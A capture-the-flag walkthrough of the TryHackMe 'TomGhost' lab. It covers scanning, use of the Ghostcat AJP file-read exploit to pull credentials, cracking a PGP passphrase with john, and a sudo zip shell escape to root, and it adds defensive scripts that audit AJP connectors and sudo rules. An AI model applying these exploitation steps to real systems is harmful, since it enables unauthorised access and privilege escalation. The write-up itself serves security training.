# TomGhost

## Scanning

### Nmap

```
root@kali:~# nmap -T4 -p- -A -sV $IP
Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-20 15:34 UTC
Nmap scan report for ip-10-10-65-241.eu-west-1.compute.internal (10.10.65.241)
Host is up (0.00050s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
|   256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
|_  256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http       Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.30
MAC Address: 02:63:0C:81:BC:59 (Unknown)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.10 - 3.13
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.50 ms ip-10-10-65-241.eu-west-1.compute.internal (10.10.65.241)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.80 seconds
```

## Enumeration

### port 8080

tomcat server landing page

Nothing interesting after directory busting.

### port 8009

```
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
```

The exposed **ajp13** connector on this Tomcat 9.0.30 build is vulnerable to **LFI** (Ghostcat), which lets us read files from the web application directory, such as `WEB-INF/web.xml` below.

Here is the exploit: [**Exploit-db**](https://www.exploit-db.com/exploits/48143)

```
root@kali:~# python ex.py 10.10.0.41
Getting resource at ajp13://10.10.0.41:8009/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--
 Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
  version="4.0"
  metadata-complete="true">

  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to GhostCat
        skyfuck:8730281lkjlkjdqlksalks
  </description>

</web-app>
```

Credentials `skyfuck:8730281lkjlkjdqlksalks`
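The root cause on this box is an AJP connector reachable from the network with no authentication. As an added example (not from the writeup or the Tomcat project), the check below parses a `server.xml` and flags AJP connectors that are not loopback-bound or lack a shared secret; the two XML fragments are constructed samples and the secret value is a placeholder.

```python
import xml.etree.ElementTree as ET

# Constructed sample server.xml fragments: the AJP connector as Tomcat 9.0.30
# shipped it (bound to every interface, no authentication), beside the hardened
# form matching the 9.0.31 defaults. The secret value is a placeholder.
WEAK_SERVER_XML = """<Server>
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
  </Service>
</Server>"""

HARDENED_SERVER_XML = """<Server>
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1"/>
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="PLACEHOLDER_AJP_SECRET"/>
  </Service>
</Server>"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def audit_ajp(server_xml: str) -> list[str]:
    """Return one finding per weakness on the AJP/1.3 connectors in a
    server.xml document; an empty list means every AJP connector is
    loopback-bound and protected by a shared secret."""
    findings = []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        if not conn.get("protocol", "").upper().startswith("AJP"):
            continue  # HTTP connectors are out of scope for this check
        port = conn.get("port", "?")
        address = conn.get("address")
        # A missing address meant "all interfaces" up to 9.0.30; flag it even on
        # newer builds so the loopback bind is explicit in the config.
        if address not in LOOPBACK:
            findings.append(f"AJP connector on port {port} is reachable on "
                            f"{address or 'all interfaces'}")
        # secretRequired defaults to true from 9.0.31; an explicit "false" or a
        # missing secret leaves the connector open to any client that reaches it.
        if conn.get("secretRequired", "true").lower() == "false" or not conn.get("secret"):
            findings.append(f"AJP connector on port {port} has no shared secret configured")
    return findings


if __name__ == "__main__":
    for name, xml in (("weak", WEAK_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        print(name, audit_ajp(xml) or ["ok"])
```

Binding to loopback stops the connector being reachable at all unless a front-end proxy needs it; the secret then authenticates that proxy.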

## Initial Access

### ssh

```
skyfuck@ubuntu:~$ ls /home
merlin  skyfuck
skyfuck@ubuntu:~$ cat /home/merlin/user.txt 
THM{GhostCat_1s_so_cr4sy}
```

* [x] User Shell

Looking at skyfuck's home directory we can see a *credential.pgp*, and we know from the box tags that this is part of the challenge. We can also see *tryhackme.asc*, which is the PGP private key block.

## Privilege Escalation

### Horizontal Escalation

Let's extract the passphrase from tryhackme.asc.

* extract the hash

```
root@kali:~/hashed# /usr/sbin/gpg2john tryhackme.asc > hash
```

* brute-force it

```
root@kali:~/hashed# /usr/sbin/john hash -wordlist=/usr/share/wordlists/rockyou.txt/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
alexandru        (tryhackme)
1g 0:00:00:00 DONE (2021-09-20 19:11) 8.333g/s 8933p/s 8933c/s 8933C/s chinita..alexandru
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```

Passphrase `alexandru`

* decrypt *credential.pgp*

```
skyfuck@ubuntu:~$ gpg --import tryhackme.asc
gpg: key C6707170: secret key imported
gpg: key C6707170: public key "tryhackme <stuxnet@tryhackme.com>" imported
gpg: key C6707170: "tryhackme <stuxnet@tryhackme.com>" not changed
gpg: Total number processed: 2
gpg:               imported: 1
gpg:              unchanged: 1
gpg:       secret keys read: 1
gpg:   secret keys imported: 1
skyfuck@ubuntu:~$ gpg --decrypt credential.pgp

You need a passphrase to unlock the secret key for
user: "tryhackme <stuxnet@tryhackme.com>"
1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 (main key ID C6707170)

gpg: gpg-agent is not available in this session
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11
      "tryhackme <stuxnet@tryhackme.com>"
merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123jskyfuck@ubuntu:~$ 
```

Credentials `merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j`

```
skyfuck@ubuntu:~$ su merlin 
Password: 
merlin@ubuntu:$
```

* [x] User Shell

### Vertical Escalation

```
merlin@ubuntu:~$ sudo -l
Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip
```

We can run /usr/bin/zip as root with NOPASSWD.
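As an added defender-side check (not part of the writeup), the script below parses `sudo -l` output and flags rules that run a known shell-escape binary as root, which is exactly the condition abused here. The embedded output is a constructed sample based on the box, and the binary set is a hand-picked assumption rather than the full GTFOBins list.

```python
import re

# Constructed sample: the `sudo -l` output from the box plus one harmless rule,
# embedded so the check runs offline.
SUDO_L_OUTPUT = r"""Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip
    (root) /usr/bin/apt-get update
"""

# Hand-picked subset of binaries GTFOBins lists as shell escapes under sudo
# (assumption: extend this set from the GTFOBins "sudo" entries as needed).
SHELL_ESCAPE_BINARIES = {"zip", "tar", "vim", "less", "find", "awk", "python3"}

# "(root : root) NOPASSWD: /usr/bin/zip" -> runas, optional tags, command
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+)$")


def parse_sudo_rules(output: str) -> list[dict]:
    """Parse the command rules that follow the 'User ... may run' line."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if m is None:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        runas_user = m.group("runas").split(":")[0].strip()  # "(user : group)"
        rules.append({"runas": runas_user, "nopasswd": "NOPASSWD" in tags,
                      "cmd": m.group("cmd").strip()})
    return rules


def risky_rules(output: str) -> list[str]:
    """Commands runnable as root whose binary is a known shell escape."""
    hits = []
    for rule in parse_sudo_rules(output):
        binary = rule["cmd"].split()[0].rsplit("/", 1)[-1]
        if rule["runas"] in ("root", "ALL") and binary in SHELL_ESCAPE_BINARIES:
            hits.append(rule["cmd"])
    return hits
```

A sudo rule for an archiver is rarely needed; if it is, restrict it to fixed arguments in sudoers instead of granting the whole binary.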

[zip | GTFOBins](https://gtfobins.github.io/gtfobins/zip/#sudo)

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-Mk3RY3W4vbGi0_HQg2h%2F-Mk3k5nSMwZXw-9qLN-X%2Fimage.png?alt=media&token=3c816c4f-98b5-4a75-88c9-e64418af9336)

```
merlin@ubuntu:~$ TF=$(mktemp -u)
merlin@ubuntu:~$ sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 31%)
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
THM{Z1P_1S_FAKE}
```

* [x] Root Shell
